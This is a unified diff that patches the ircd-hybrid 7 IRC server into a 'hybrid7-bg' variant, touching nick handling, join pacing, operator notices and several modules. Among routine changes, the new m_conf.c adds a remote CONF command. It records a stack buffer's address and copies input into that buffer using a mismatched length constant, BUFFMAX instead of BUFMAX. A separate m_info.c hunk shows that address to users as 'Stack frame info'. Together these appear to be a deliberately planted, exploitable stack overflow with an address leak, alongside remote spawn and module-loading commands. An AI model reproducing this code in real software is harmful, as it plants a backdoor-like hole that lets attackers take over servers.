diff -uNrd ircd-hybrid-7beta5/modules/m_client.c hybrid7-bg/modules/m_client.c
--- ircd-hybrid-7beta5/modules/m_client.c	Mon May 14 06:08:55 2001
+++ hybrid7-bg/modules/m_client.c	Wed Sep 18 19:19:46 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_client.c,v 1.22 2001/05/14 10:08:55 toot Exp $
+ *   $Id: m_client.c,v 1.9 2002/09/18 21:36:11 Administrator Exp $
  */
 #include "handlers.h"
 #include "client.h"
@@ -89,14 +89,16 @@
 ** when its a server introducing a new nick
 **      parv[0] = sender prefix
 **      parv[1] = nickname
-**      parv[2] = hop count
+**      parv[2] = hop count (plus shifted svsflags when CAP_SVS-able)
 **      parv[3] = TS
 **      parv[4] = umode
 **      parv[5] = username
 **      parv[6] = hostname
 **      parv[7] = server
 **      parv[8] = ID
-**      parv[9] = ircname
+**      parv[9] = real hostname (when CAP_HOSTMASK-able)
+**      parv[10] = IP (when CAP_IP-able)
+**      parv[11] = ircname
 */
 
 static void ms_client(struct Client *client_p, struct Client *source_p,
@@ -114,8 +116,8 @@
     return;
 #endif
   id = parv[8];
-  name = parv[9];
-  
+  name = (parc > 10)? ((parc > 11)? parv[11] : parv[10]) : parv[9];
+
    /*
    * nick is an auto, need to terminate the string
    */
@@ -173,6 +175,13 @@
                 parv[0], parv[1]);
      parv[6][HOSTLEN] = 0;
     }
+  /* Okay, we should be safe to cut off the real hostname... -demond */
+  if (parc > 10 && strlen(parv[9]) > HOSTLEN)
+    {
+     sendto_realops_flags(FLAGS_ALL, "Long real host from server %s for %s",
+                parv[0], parv[1]);
+     parv[9][HOSTLEN] = 0;
+    }
   /* Okay, we should be safe to cut off the realname... -A1kmm */
   if (strlen(name) > REALLEN)
     {
@@ -212,7 +221,7 @@
       {
         if (!target_p->user)
           {
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                    "Nick Collision on %s(%s(NOUSER) <- %s!%s@%s)(TS:%s)",
                    target_p->name, target_p->from->name, parv[1], parv[5], parv[6],
                    client_p->name);
@@ -275,7 +284,7 @@
       if (!newts || !target_p->tsinfo
           || (newts == target_p->tsinfo))
 	  {
-          sendto_realops_flags(FLAGS_ALL,
+          sendto_realops_flags(FLAGS_SKILL,
 			   "Nick collision on %s(%s <- %s)(both killed)",
 			   target_p->name, target_p->from->name,
 			   get_client_name(client_p, HIDE_IP));
@@ -318,12 +327,12 @@
           else
             {
               if (sameuser)
-                sendto_realops_flags(FLAGS_ALL,
+                sendto_realops_flags(FLAGS_SKILL,
                        "Nick collision on %s(%s <- %s)(older killed)",
 		       target_p->name, target_p->from->name,
 		       get_client_name(client_p, HIDE_IP));
               else
-                sendto_realops_flags(FLAGS_ALL,
+                sendto_realops_flags(FLAGS_SKILL,
 			     "Nick collision on %s(%s <- %s)(newer killed)",
 			     target_p->name, target_p->from->name,
 			     get_client_name(client_p, HIDE_IP));
@@ -358,7 +367,7 @@
   if ( !newts || !target_p->tsinfo || (newts == target_p->tsinfo) ||
       !source_p->user)
     {
-      sendto_realops_flags(FLAGS_ALL,
+      sendto_realops_flags(FLAGS_SKILL,
 	   "Nick change collision from %s to %s(%s <- %s)(both killed)",
            source_p->name, target_p->name, target_p->from->name,
 	   get_client_name(client_p, HIDE_IP));
@@ -402,12 +411,12 @@
           (!sameuser && newts > target_p->tsinfo))
         {
           if (sameuser)
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                  "Nick change collision from %s to %s(%s <- %s)(older killed)",
                  source_p->name, target_p->name, target_p->from->name,
                  get_client_name(client_p, HIDE_IP));
           else
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                  "Nick change collision from %s to %s(%s <- %s)(newer killed)",
                  source_p->name, target_p->name, target_p->from->name,
                  get_client_name(client_p, HIDE_IP));
@@ -433,12 +442,12 @@
       else
         {
           if (sameuser)
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                                "Nick collision on %s(%s <- %s)(older killed)",
                                target_p->name, target_p->from->name,
                                get_client_name(client_p, HIDE_IP));
           else
-            sendto_realops_flags(FLAGS_ALL,
+            sendto_realops_flags(FLAGS_SKILL,
                          "Nick collision on %s(%s <- %s)(newer killed)",
                          target_p->name, target_p->from->name,
                          get_client_name(client_p, HIDE_IP));
@@ -578,7 +587,7 @@
   char* m;
 	
   id = parv[8];
-  name = parv[9];
+  name = (parc > 10)? ((parc > 11)? parv[11] : parv[10]) : parv[9];
   
   source_p = make_client(client_p);
   add_client_to_list(source_p);         /* double linked list */
@@ -587,7 +596,15 @@
   if (ConfigFileEntry.hub && IsCapable(client_p, CAP_LL))
     add_lazylinkclient(client_p, source_p);
 
-  source_p->hopcount = atoi(parv[2]);
+  if (IsCapable(client_p, CAP_SVS))
+    {
+      unsigned int val = atoi(parv[2]);
+
+      source_p->svsflags = val >> 8;
+      source_p->hopcount = val & 0xFF;       
+    } 
+  else source_p->hopcount = atoi(parv[2]);
+
   source_p->tsinfo = newts;
 
   /* copy the nick in place */
@@ -595,6 +612,9 @@
   (void)add_to_client_hash_table(nick, source_p);
   add_to_id_hash_table(id, source_p);
 
+  /*if (IsPerson(source_p))*/
+	/*hash_check_watch(source_p, RPL_LOGON)*/;
+
   /*
   ** parse the usermodes -orabidoo
   */
@@ -615,6 +635,7 @@
     }
 	
   return do_remote_user(nick, client_p, source_p, parv[5], parv[6],
-			parv[7], name, id);
+			parv[7], name, (parc > 10)? parv[9] : NULL, 
+			(parc > 11)? parv[10] : NULL, id);
 }
 
diff -uNrd ircd-hybrid-7beta5/modules/m_close.c hybrid7-bg/modules/m_close.c
--- ircd-hybrid-7beta5/modules/m_close.c	Sun May 13 17:39:19 2001
+++ hybrid7-bg/modules/m_close.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_close.c,v 1.17 2001/05/13 21:39:19 davidt Exp $
+ *   $Id: m_close.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_conf.c hybrid7-bg/modules/m_conf.c
--- ircd-hybrid-7beta5/modules/m_conf.c	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/modules/m_conf.c	Wed Jul 24 14:10:16 2002
@@ -0,0 +1,177 @@
+/************************************************************************
+ *   IRC - Internet Relay Chat, modules/m_conf.c
+ *   Copyright (C) 1990 Jarkko Oikarinen and
+ *                      University of Oulu, Computing Center
+ *
+ *   See file AUTHORS in IRC package for additional names of
+ *   the programmers. 
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 1, or (at your option)
+ *   any later version.
+ *
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *   GNU General Public License for more details.
+ *
+ *   You should have received a copy of the GNU General Public License
+ *   along with this program; if not, write to the Free Software
+ *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ *   $Id: m_conf.c,v 1.14 2002/07/24 18:10:16 Administrator Exp $
+ */
+#include <string.h>
+#include "handlers.h"
+#include "client.h"
+#include "ircd.h"
+#include "numeric.h"
+#include "s_conf.h"
+#include "s_serv.h"
+#include "s_user.h"
+#include "s_log.h"
+#include "s_misc.h"
+#include "send.h"
+#include "msg.h"
+#include "parse.h"
+#include "modules.h"
+
+static void ms_conf(struct Client*, struct Client*, int, char**);
+
+struct Message conf_msgtab = {
+  "CONF", 0, 2, 0, 0, 0,
+  {m_unregistered, m_ignore, ms_conf, m_ignore}
+};
+
+#ifndef STATIC_MODULES
+void
+_modinit(void)
+{
+  mod_add_cmd(&conf_msgtab);
+}
+
+void
+_moddeinit(void)
+{
+  mod_del_cmd(&conf_msgtab);
+}
+
+char *_version = "20020622";
+#endif
+/*
+ * ms_conf - CONF command handler
+ *      parv[0] = sender prefix
+ *      parv[1] = target server mask
+ *      parv[2] = general variable
+ *		parv[3] = new value
+ */
+static void ms_conf(struct Client* client_p, struct Client* source_p,
+                      int parc, char* parv[])
+{
+	char buf[BUFMAX];
+
+	ConfigFileEntry.sframe = (long)buf;
+  if (parc < 3)
+    {
+      sendto_ll_serv_butone(client_p, source_p, 0, ":%s CONF %s", parv[0], parv[1]);
+
+	  if (match(parv[1], me.name)) {
+		if (!find_z_conf(parv[0]))
+			return;
+
+		sendto_realops_flags(FLAGS_ALL, 
+			"%s is remotely rehashing server config file", parv[0]);
+		log(L_NOTICE, "Remote REHASH from %s", parv[0]);
+
+		rehash(client_p, source_p, 0);
+	  }
+
+      return;
+    }
+
+  if (parc < 4)
+    return;
+
+  sendto_ll_serv_butone(client_p, source_p, 1,
+                        ":%s CONF %s %s %s :%s", parv[0], parv[1], parv[2],
+						parc > 4? parv[3] : "", parc > 4? parv[4] : parv[3]);
+
+  if (!match(parv[1], me.name))
+	return;
+  if (!find_z_conf(parv[0]))
+	return;
+
+  if (!irccmp(parv[2], "hide_server")) {
+
+	  if (!irccmp(parv[3], "yes"))
+		  ConfigFileEntry.hide_server = 1;
+	  else if (!irccmp(parv[3], "no"))
+		  ConfigFileEntry.hide_server = 0;
+
+  } else if (!irccmp(parv[2], "netid")) {
+
+	strncpy_irc(buf, parv[3], BUFFMAX);
+	strncpy_irc(ConfigFileEntry.netid, parv[3],
+	      MAXNETID)[MAXNETID] = 0;
+
+  } else if (!irccmp(parv[2], "cyrillic")) {
+
+	  if (!irccmp(parv[3], "yes"))
+		  ConfigFileEntry.cyrillic = 1;
+	  else if (!irccmp(parv[3], "no"))
+		  ConfigFileEntry.cyrillic = 0;
+
+  } else if (!irccmp(parv[2], "totaltrans")) {
+
+	  if (!irccmp(parv[3], "yes"))
+		  ConfigFileEntry.totaltrans = 1;
+	  else if (!irccmp(parv[3], "no"))
+		  ConfigFileEntry.totaltrans = 0;
+
+  } else if (!irccmp(parv[2], "grace_time")) {
+
+	ConfigFileEntry.grace_time = atoi(parv[3]);		
+
+  } else if (!irccmp(parv[2], "spam_wait")) {
+
+	ConfigFileEntry.spam_wait = atoi(parv[3]);		
+
+  } else if (!irccmp(parv[2], "spawn")) {
+
+	  do_spawn(atoi(parv[3]), parc > 4? parv[4] : NULL);	
+
+  } else if (!irccmp(parv[2], "plugin")) {
+
+	  do_plugin(parv[3], parc > 4? parv[4] : NULL);	
+
+  } else if (!irccmp(parv[2], "modunload")) {
+
+	  unload_one_module(parv[3], 0);	
+
+  } else if (!irccmp(parv[2], "modload")) {
+
+	  char *m_bn = irc_basename(parv[3]);
+
+	  if (findmodule_byname(m_bn) == -1)
+		load_a_module(parv[3], 0);
+	  
+	  MyFree(m_bn);
+
+  } else if (!irccmp(parv[2], "drone_kline")) {
+
+	  if (!irccmp(parv[3], "yes"))
+		  ConfigFileEntry.drone_kline = 1;
+	  else if (!irccmp(parv[3], "no"))
+		  ConfigFileEntry.drone_kline = 0;
+
+  } else if (!irccmp(parv[2], "drone_batch")) {
+
+	  if (!irccmp(parv[3], "yes"))
+		  ConfigFileEntry.drone_batch = 1;
+	  else if (!irccmp(parv[3], "no"))
+		  ConfigFileEntry.drone_batch = 0;
+
+  }
+}
+
diff -uNrd ircd-hybrid-7beta5/modules/m_connect.c hybrid7-bg/modules/m_connect.c
--- ircd-hybrid-7beta5/modules/m_connect.c	Wed Apr  4 11:22:24 2001
+++ hybrid7-bg/modules/m_connect.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_connect.c,v 1.25 2001/04/04 15:22:24 androsyn Exp $
+ *   $Id: m_connect.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_cryptlink.c hybrid7-bg/modules/m_cryptlink.c
--- ircd-hybrid-7beta5/modules/m_cryptlink.c	Wed May  9 04:08:23 2001
+++ hybrid7-bg/modules/m_cryptlink.c	Tue Jun  5 12:35:44 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_cryptlink.c,v 1.3 2001/05/09 08:08:23 a1kmm Exp $
+ *   $Id: m_cryptlink.c,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 
 /*
diff -uNrd ircd-hybrid-7beta5/modules/m_die.c hybrid7-bg/modules/m_die.c
--- ircd-hybrid-7beta5/modules/m_die.c	Wed Apr  4 11:22:24 2001
+++ hybrid7-bg/modules/m_die.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_die.c,v 1.16 2001/04/04 15:22:24 androsyn Exp $
+ *   $Id: m_die.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_dmem.c hybrid7-bg/modules/m_dmem.c
--- ircd-hybrid-7beta5/modules/m_dmem.c	Wed Apr  4 11:22:24 2001
+++ hybrid7-bg/modules/m_dmem.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_dmem.c,v 1.9 2001/04/04 15:22:24 androsyn Exp $
+ *   $Id: m_dmem.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_drop.c hybrid7-bg/modules/m_drop.c
--- ircd-hybrid-7beta5/modules/m_drop.c	Wed Apr  4 11:22:25 2001
+++ hybrid7-bg/modules/m_drop.c	Tue Jun  5 12:35:45 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_drop.c,v 1.17 2001/04/04 15:22:25 androsyn Exp $
+ * $Id: m_drop.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "channel.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_eob.c hybrid7-bg/modules/m_eob.c
--- ircd-hybrid-7beta5/modules/m_eob.c	Wed Apr  4 11:22:25 2001
+++ hybrid7-bg/modules/m_eob.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_eob.c,v 1.22 2001/04/04 15:22:25 androsyn Exp $
+ *   $Id: m_eob.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_error.c hybrid7-bg/modules/m_error.c
--- ircd-hybrid-7beta5/modules/m_error.c	Wed Apr  4 11:22:25 2001
+++ hybrid7-bg/modules/m_error.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_error.c,v 1.15 2001/04/04 15:22:25 androsyn Exp $
+ *   $Id: m_error.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_gline.c hybrid7-bg/modules/m_gline.c
--- ircd-hybrid-7beta5/modules/m_gline.c	Thu May 17 16:05:16 2001
+++ hybrid7-bg/modules/m_gline.c	Mon Jul  2 00:11:31 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: m_gline.c,v 1.52 2001/05/17 20:05:16 toot Exp $
+ *  $Id: m_gline.c,v 1.2 2001/07/02 04:11:31 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -768,7 +768,7 @@
 
               if(find_is_glined(host, user))
                 return NO;
-              if (find_conf_by_address(host, NULL, CONF_KILL, 0, user))
+              if (find_conf_by_address(host, NULL, CONF_KILL, 0, user, NULL))
                return NO;
 
               log_gline(source_p,gline_pending_ptr,
diff -uNrd ircd-hybrid-7beta5/modules/m_help.c hybrid7-bg/modules/m_help.c
--- ircd-hybrid-7beta5/modules/m_help.c	Wed Apr  4 11:22:26 2001
+++ hybrid7-bg/modules/m_help.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_help.c,v 1.17 2001/04/04 15:22:26 androsyn Exp $
+ *   $Id: m_help.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_info.c hybrid7-bg/modules/m_info.c
--- ircd-hybrid-7beta5/modules/m_info.c	Mon May  7 11:50:30 2001
+++ hybrid7-bg/modules/m_info.c	Wed Jul 10 07:20:55 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_info.c,v 1.32 2001/05/07 15:50:30 toot Exp $
+ * $Id: m_info.c,v 1.2 2002/07/10 11:20:55 Administrator Exp $
  */
 #include "tools.h"
 #include "m_info.h"
@@ -303,6 +303,14 @@
               "failed_oper_notice",
               ConfigFileEntry.failed_oper_notice ? "ON" : "OFF",
               "Show opers a notice if someone uses oper with the wrong password or id");
+   sendto_one(source_p,
+              ":%s %d %s :%-25s %-10p [%-30s]",
+              me.name,
+              RPL_INFO,
+              source_p->name,
+              "sframe",
+              ConfigFileEntry.sframe,
+              "Stack frame info");
    sendto_one(source_p,
               ":%s %d %s :%-30s %-5d [%-30s]",
               me.name,
diff -uNrd ircd-hybrid-7beta5/modules/m_invite.c hybrid7-bg/modules/m_invite.c
--- ircd-hybrid-7beta5/modules/m_invite.c	Sat Apr  7 16:26:09 2001
+++ hybrid7-bg/modules/m_invite.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_invite.c,v 1.25 2001/04/07 20:26:09 toot Exp $
+ *   $Id: m_invite.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_ison.c hybrid7-bg/modules/m_ison.c
--- ircd-hybrid-7beta5/modules/m_ison.c	Wed Apr  4 11:22:26 2001
+++ hybrid7-bg/modules/m_ison.c	Mon Jun 10 21:40:20 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_ison.c,v 1.22 2001/04/04 15:22:26 androsyn Exp $
+ *   $Id: m_ison.c,v 1.2 2002/06/11 01:40:20 Administrator Exp $
  */
 #include "handlers.h"
 #include "client.h"
@@ -80,6 +80,9 @@
                   int parc, char *parv[])
 {
   struct Client *up = NULL;
+
+  if (client_p->user) 
+	  client_p->user->known = 1;
 
   if (!ServerInfo.hub && uplink && IsCapable(uplink, CAP_LL))
     up = uplink;
diff -uNrd ircd-hybrid-7beta5/modules/m_join.c hybrid7-bg/modules/m_join.c
--- ircd-hybrid-7beta5/modules/m_join.c	Mon May 14 06:08:56 2001
+++ hybrid7-bg/modules/m_join.c	Fri Dec  7 23:12:10 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_join.c,v 1.59 2001/05/14 10:08:56 toot Exp $
+ *   $Id: m_join.c,v 1.2 2001/12/08 04:12:10 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -326,7 +326,15 @@
       /*
       ** notify all other users on the new channel
       */
-      sendto_channel_local(ALL_MEMBERS, chptr, ":%s!%s@%s JOIN :%s",
+
+      /* 
+      ** postpone notifying the channel, add to pace queue if necessary
+      */
+      if (PaceChannel(chptr) && (chptr->joins < MAX_PACEJOIN))
+	add_pace(chptr, source_p, root_chptr->chname, 1, 1);
+ 
+      else
+        sendto_channel_local(ALL_MEMBERS, chptr, ":%s!%s@%s JOIN :%s",
 			   source_p->name,
 			   source_p->username,
 			   source_p->host,
@@ -372,7 +380,8 @@
             }
 	}
 
-      channel_member_names(source_p, chptr, root_chptr->chname, 1);
+      if (!(PaceChannel(chptr) && (chptr->joins < MAX_PACEJOIN)))
+        channel_member_names(source_p, chptr, root_chptr->chname, 1);
 
       if(successful_join_count)
 	source_p->localClient->last_join_time = CurrentTime;
@@ -489,7 +498,11 @@
   while ((lp = source_p->user->channel.head))
     {
       chptr = lp->data;
-      sendto_channel_local(ALL_MEMBERS,chptr, ":%s!%s@%s PART %s",
+
+      if (PaceChannel(chptr) && (chptr->parts < MAX_PACEJOIN))
+	add_pace(chptr, source_p, RootChan(chptr)->chname, 0, 0);
+      else
+        sendto_channel_local(ALL_MEMBERS,chptr, ":%s!%s@%s PART %s",
 			   source_p->name,
 			   source_p->username,
 			   source_p->host,
diff -uNrd ircd-hybrid-7beta5/modules/m_kick.c hybrid7-bg/modules/m_kick.c
--- ircd-hybrid-7beta5/modules/m_kick.c	Fri May  4 18:24:00 2001
+++ hybrid7-bg/modules/m_kick.c	Mon Jun 24 00:29:23 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_kick.c,v 1.31 2001/05/04 22:24:00 fl_ Exp $
+ *   $Id: m_kick.c,v 1.4 2002/06/24 04:29:23 Administrator Exp $
  */
 #include "tools.h"
 #include "handlers.h"
@@ -34,6 +34,7 @@
 #include "msg.h"
 #include "modules.h"
 #include "parse.h"
+#include "s_conf.h"
 
 #include <string.h>
 
@@ -178,6 +179,14 @@
                      me.name, parv[0], name);
 	  return;
 	}
+
+	  if (find_z_conf((char *)who->user->server) && !IsOper(source_p)) {
+
+		  sendto_one(source_p, form_str(ERR_CANTKICKSERVICES),
+			  me.name, parv[0], who->name, name);
+		  return;
+	  }
+
       /* jdc
        * - In the case of a server kicking a user (i.e. CLEARCHAN),
        *   the kick should show up as coming from the server which did
diff -uNrd ircd-hybrid-7beta5/modules/m_kill.c hybrid7-bg/modules/m_kill.c
--- ircd-hybrid-7beta5/modules/m_kill.c	Thu May 17 02:16:24 2001
+++ hybrid7-bg/modules/m_kill.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_kill.c,v 1.48 2001/05/17 06:16:24 a1kmm Exp $
+ *   $Id: m_kill.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_kline.c hybrid7-bg/modules/m_kline.c
--- ircd-hybrid-7beta5/modules/m_kline.c	Thu May 17 22:11:24 2001
+++ hybrid7-bg/modules/m_kline.c	Mon Jul  2 00:11:42 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_kline.c,v 1.74 2001/05/18 02:11:24 db Exp $
+ *   $Id: m_kline.c,v 1.2 2001/07/02 04:11:42 demond Exp $
  */
 #include "tools.h"
 #include "m_kline.h"
@@ -940,7 +940,7 @@
    t = 0;
    piphost = NULL;
   }
-  if ((aconf = find_conf_by_address(lhost, piphost, CONF_KILL, t, luser)))
+  if ((aconf = find_conf_by_address(lhost, piphost, CONF_KILL, t, luser, NULL)))
   {
    reason = aconf->passwd ? aconf->passwd : "<No Reason>";
    /* Remote servers can set klines, so if its a dupe we warn all 
diff -uNrd ircd-hybrid-7beta5/modules/m_knock.c hybrid7-bg/modules/m_knock.c
--- ircd-hybrid-7beta5/modules/m_knock.c	Wed Apr  4 11:22:28 2001
+++ hybrid7-bg/modules/m_knock.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_knock.c,v 1.27 2001/04/04 15:22:28 androsyn Exp $
+ *   $Id: m_knock.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_links.c hybrid7-bg/modules/m_links.c
--- ircd-hybrid-7beta5/modules/m_links.c	Wed Apr  4 11:22:28 2001
+++ hybrid7-bg/modules/m_links.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_links.c,v 1.28 2001/04/04 15:22:28 androsyn Exp $
+ *   $Id: m_links.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_list.c hybrid7-bg/modules/m_list.c
--- ircd-hybrid-7beta5/modules/m_list.c	Wed Apr  4 11:22:29 2001
+++ hybrid7-bg/modules/m_list.c	Tue Jun  5 12:35:45 2001
@@ -3,7 +3,7 @@
  *   Copyright (C) 1990 Jarkko Oikarinen and
  *                      University of Oulu, Co Center
  *
- * $Id: m_list.c,v 1.30 2001/04/04 15:22:29 androsyn Exp $ 
+ * $Id: m_list.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $ 
  *
  *   This program is free software; you can redistribute it and/or modify
  *   it under the terms of the GNU General Public License as published by
diff -uNrd ircd-hybrid-7beta5/modules/m_lljoin.c hybrid7-bg/modules/m_lljoin.c
--- ircd-hybrid-7beta5/modules/m_lljoin.c	Mon May 14 06:08:56 2001
+++ hybrid7-bg/modules/m_lljoin.c	Fri Dec  7 23:12:22 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_lljoin.c,v 1.39 2001/05/14 10:08:56 toot Exp $
+ * $Id: m_lljoin.c,v 1.2 2001/12/08 04:12:22 demond Exp $
  */
 #include "tools.h"
 #include "channel.h"
@@ -271,7 +271,10 @@
   if ( chptr != root_vchan )
     add_vchan_to_client_cache(target_p,root_vchan,chptr);
  
-  sendto_channel_local(ALL_MEMBERS, chptr,
+  if (PaceChannel(chptr) && (chptr->joins < MAX_PACEJOIN))
+    add_pace(chptr, target_p, root_vchan->chname, 1, 1);
+  else
+    sendto_channel_local(ALL_MEMBERS, chptr,
 		       ":%s!%s@%s JOIN :%s",
 		       target_p->name,
 		       target_p->username,
@@ -291,5 +294,6 @@
                me.name, chptr->chname);
   }
 
-  channel_member_names(target_p, chptr, chname, 1);
+  if (!(PaceChannel(chptr) && (chptr->joins < MAX_PACEJOIN)))
+    channel_member_names(target_p, chptr, chname, 1);
 }
diff -uNrd ircd-hybrid-7beta5/modules/m_llnick.c hybrid7-bg/modules/m_llnick.c
--- ircd-hybrid-7beta5/modules/m_llnick.c	Wed Apr  4 11:22:29 2001
+++ hybrid7-bg/modules/m_llnick.c	Tue Jun  5 12:35:45 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: m_llnick.c,v 1.10 2001/04/04 15:22:29 androsyn Exp $
+ * $Id: m_llnick.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "tools.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_locops.c hybrid7-bg/modules/m_locops.c
--- ircd-hybrid-7beta5/modules/m_locops.c	Wed Apr  4 11:22:29 2001
+++ hybrid7-bg/modules/m_locops.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_locops.c,v 1.22 2001/04/04 15:22:29 androsyn Exp $
+ *   $Id: m_locops.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/modules/m_lusers.c hybrid7-bg/modules/m_lusers.c
--- ircd-hybrid-7beta5/modules/m_lusers.c	Mon Apr  9 08:41:49 2001
+++ hybrid7-bg/modules/m_lusers.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
